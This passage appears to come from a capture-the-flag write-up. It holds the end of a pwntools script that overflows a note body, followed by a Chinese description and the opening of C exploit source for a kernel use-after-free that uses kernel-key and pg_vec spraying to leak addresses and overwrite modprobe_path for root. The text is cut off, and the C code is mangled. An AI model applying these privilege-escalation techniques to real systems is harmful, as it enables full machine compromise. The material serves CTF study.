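        ru("Input the authentication code:")
        sh.send(p32(num))
    # menu: add note #1 with an oversized body -> vuln()
    ru(">>")
    sh.send(p32(1))
    ru("Index:")
    sh.send(p32(1))
    ru("Note")
    sh.send("a" * 0x100)
    attack()
    sh.interactive()


if __name__ == "__main__":
    func()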
ker
kmalloc-64 的 UAF(两次 free、一次 edit),存在 cg 隔离,因此使用内核密钥 + pg_vec:首先分配该结构并释放,然后用内核密钥占据该 obj,之后再次释放,再用 pg_vec 占位,此时内核密钥被覆盖、长度被改写,通过越界读 + 爆破泄露内核地址;然后利用 edit 功能把 pg_vec 改成 modprobe_path 所在页,mmap 映射后修改 modprobe_path 的内容,再执行一个未知格式的文件让内核以 root 身份调用 modprobe_path 指向的程序,借此修改 flag 权限,最终读出 flag;
C #define _GNU_SOURCE #include #include #include #include #include #include #include #include //CPU绑核 void bindCore(int core) { cpu_set_t cpu_set; CPU_ZERO(&cpu_set); CPU_SET(core, &cpu_set); sched_setaffinity(getpid(), sizeof(cpu_set), &cpu_set); printf(“ |